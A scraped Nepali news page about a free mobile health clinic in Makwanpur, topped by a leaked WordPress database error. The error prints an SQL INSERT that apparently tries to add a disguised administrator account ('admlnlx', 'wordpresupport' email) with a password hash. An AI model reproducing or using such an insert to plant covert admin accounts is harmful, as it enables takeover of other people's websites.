WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6TaE97D/0pks.DdzyALbx/BxNRY8N/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 10:56:41', '', 'admlnlx', 'admlnlx')
मकवानपुर, मंसिर १६–
मकवानपुरको सिस्नेरी गा.विस. स्वास्थ्य चौकीमा निःशुल्क घुम्ती स्वास्थ्य क्लिनिक सम्पन्न भएको छ । सो शिविरमा १०२ जनाले स्वास्थ्य परीक्षण गराएका छन् । सो कार्यक्रममा चिकित्सक टोलीहरुमा दन्तरोग विशेषज्ञ डा अरिफ करिम, फीजिसियन डा सुष्मा हुल्जार र सहयोगी पुण्य निरौला र सि.एम.ए. श्रीदेवी थापा रहनुभएको थियो ।
यूवा सेवा समाज (युसेस) र यूनिलिभरको लायफव्याय प्रोडक्टको सहकार्यमा संचालित उक्त कार्यक्रममा दन्तरोग विशेषज्ञ डा करिमले दन्त समस्या लिएर आउने ४७ जना मध्ये १६ जनाको किराले खाएको दाँत झिकेर फालिएको जानकारी दिनुभयो ।
डा सुष्मा हुल्जारले ५५ जना महिलाहरुको स्वास्थ्य परीक्षण गर्नु भएको थियो । उनका अनुसार अधिकांस महिलाहरुमा महिनावारी गडवडी र पाठेघर सम्बन्धी समस्या देखिएको छ ।